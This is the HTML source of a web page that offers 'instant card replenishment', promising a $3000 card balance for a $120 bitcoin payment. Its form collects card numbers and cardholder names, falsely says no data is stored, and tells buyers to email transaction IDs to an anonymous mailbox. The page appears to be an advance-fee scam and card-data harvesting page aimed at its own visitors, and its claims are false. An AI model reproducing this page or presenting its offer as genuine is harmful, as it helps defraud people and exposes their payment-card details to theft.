<!DOCTYPE html>
<html lang="de">
<head>
    <meta charset="UTF-8"/>
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0"/>
    <meta name="description" content="Instant card replenishment. Purchase credit card 5000$."/>
    <meta name="keywords" content="credit card,card replenishment,buy card,balance card"/>
    <title>Instant deposit card balance</title>
    <link rel="stylesheet" href="/Cards33X66/css/inuit.css"/>
    <link rel="stylesheet" href="/Cards33X66/css/fluid-grid16-1100px.css"/>
    <link rel="stylesheet" href="/Cards33X66/css/eve-styles.css"/>
    <link rel="shortcut icon" href="/Cards33X66/img/icon.png"/>
    <link rel="apple-touch-icon-precomposed" href="/Cards33X66/img/icon.png"/>
    <link rel="stylesheet" href="/Cards33X66/css/formalize.css"/>
    <style type="text/css"> .buttons {
        text-decoration: none;
        margin-left: 100px;
        text-align: center;
        padding: 8px 18px;
        border: solid 1px #cccccc;
        -webkit-border-radius: 4px;
        -moz-border-radius: 4px;
        border-radius: 4px;
        font: 14px Arial, Helvetica, sans-serif;
        font-weight: bold;
        color: #666666;
        background-color: #f7fbfc;
        background-image: -moz-linear-gradient(top, #ffffff 0%, #dddddd 100%);
        background-image: -webkit-linear-gradient(top, #ffffff 0%, #dddddd 100%);
        background-image: -o-linear-gradient(top, #fffffff 0%, #dddddd 100%);
        filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#dddddd', endColorstr='#dddddd', GradientType=0);
        background-image: linear-gradient(top, #ffffff 0%, #dddddd 100%);
        -webkit-box-shadow: inset 0px 0px 1px #ffffff;
        -moz-box-shadow: inset 0px 0px 1px #ffffff;
        box-shadow: inset 0px 0px 1px #ffffff;
    }</style>
</head>
<!--===============================================================  Logo, social and menu =====================================================================================-->
<body>
<div class="wrapper"><a href="/" id="logo"><img src="/Cards33X66/img/logo.png" alt="logo"/>
    <h1 class="accessibility">INSTANT CARD REPLENISHMENT</h1></a>
    <ul id="nav" class="main">
        <li><a href="/" class="active">Home</a></li>
    </ul>
    <div class="social"><strong style="font-size:22px; padding-right: 30px;">INSTANT CARD REPLENISHMENT</strong></div>
</div>
<div class="clear"></div>
<!--===============================================================  Left content, address =====================================================================================-->
<div class="wrapper">
    <div class="grids top">
        <div class="grid-6 grid">
            <div class="green bottom"><h3>Instruction</h3>
                <ul style="padding:15px;">
                    <li> Name on card is necessarily! Don't worry, it's absolutely safe, we don't storage any
                        information of our clients.
                    </li>
                    <li> Select payment system on your card.</li>
                    <li> Select your Location and Currency.</li>
                    <li> Recheck the fields for mistakes and click "Send".</li>
                    <li> On the payment page you will see the wallet and the amount that you need to send.</li>
                    <li> Pay in bitcoin equivalent in any convenient way.</li>
                    <li> Your order is paid after 2 confirmations.</li>
                    <li>Send the transaction number Cards3366@airmail.cc</li>
                </ul>
            </div>
        </div>
        <!--===============================================================  Contact form =====================================================================================-->
        <div class="grid-10 grid"><h2>Your order</h2>
            <!--An example for a contact form from formalize.me, table in use.</h6>-->
            <form action="/payment"
                  method="post">
                <input type="hidden" name="price" value="120">
                <input type="hidden" name="balance" value="3000">
                <table class="form">
                    <tr>
                        <th><label for="name"> Balance </label></th>
                        <td> $3000</td>
                    </tr>
                    <tr>
                        <th><label for="name"> Card number </label></th>
                        <td><input class="input_full" type="text" id="name" name="name"
                                   placeholder="0000 0000 0000 0000" required="required"/></td>
                    </tr>
                    <tr>
                        <th><label for="name"> Name on card </label></th>
                        <td><input class="input_full" type="text" id="name" name="name" placeholder="Jack Smith"
                                   required="required"/></td>
                    </tr>
                    <tr>
                        <th><label for="subject"> Payment system </label></th>
                        <td><select class="input_full" id="subject" name="subject" required>
                            <option value="">Select...</option>
                            <option value="3k_4k">Visa</option>
                            <option value="1k_2k">MasterCard</option>
                            <option value="2k_3k">American Express</option>
                            <option value="1k_2k">Discover Card</option>
                            <option value="3k_4k">Diners Club</option>
                            <option value="3k_4k">Maestro</option>
                            <option value="3k_4k">Solo</option>
                            <option value="3k_4k">Interac</option>
                            <option value="3k_4k">Carte Bleue</option>
                            <option value="3k_4k">RuPay</option>
                            <option value="3k_4k">Interac</option>
                            <option value="4k_5k">UnionPay</option>
                            <option value="2k_3k">JCB</option>
                            <option value="2k_3k">Other</option>
                        </select></td>
                    </tr>
                    <tr>
                        <th><label for="subject"> Location </label></th>
                        <td><select class="input_full" id="subject" name="subject" required>
                            <option value="">Select...</option>
                            <option value="1k_2k">Europe</option>
                            <option value="1k_2k">Asia</option>
                            <option value="3k_4k">North America</option>
                            <option value="4k_5k">South America</option>
                            <option value="2k_3k">Africa</option>
                            <option value="2k_3k">Australia & Oceania</option>
                        </select></td>
                    </tr>
                    <tr>
                        <th><label for="priority_normal"> Currency </label></th>
                        <td><select class="input_full" id="subject" name="subject" required>
                            <option value="">Select...</option>
                            <option value="1k_2k">USD</option>
                            <option value="1k_2k">EUR</option>
                            <option value="2k_3k">GBP</option>
                            <option value="3k_4k">RUB</option>
                            <option value="4k_5k">UAH</option>
                            <option value="2k_3k">INR</option>
                            <option value="3k_4k">BRL</option>
                            <option value="3k_4k">JPY</option>
                            <option value="3k_4k">CNY</option>
                            <option value="2k_3k">Other</option>
                        </select></td>
                    </tr>
                </table>
                <p>
                    <!--<input type="submit" value="Send" class="float_left" />                                 <input type="reset" value="Reset" class="float_right">                                 -->                                                               </p>

            <p><button type="submit" class="buttons">Send</button>
            </p></form></div>
    </div>
</div>
<!--========================================================================== Footer =====================================================================================-->
<div class="wrapper">
    <div id="footer">
        <div class="grids">
            <div class="grid-5 grid text-center"><p>33x66 &copy; Instant card replenishment</p></div>
            <div class="grid-5 grid text-center"><p><b>Cards3366@airmail.cc</b></p></div>
        </div>
    </div>
</div>
</body>
</html>
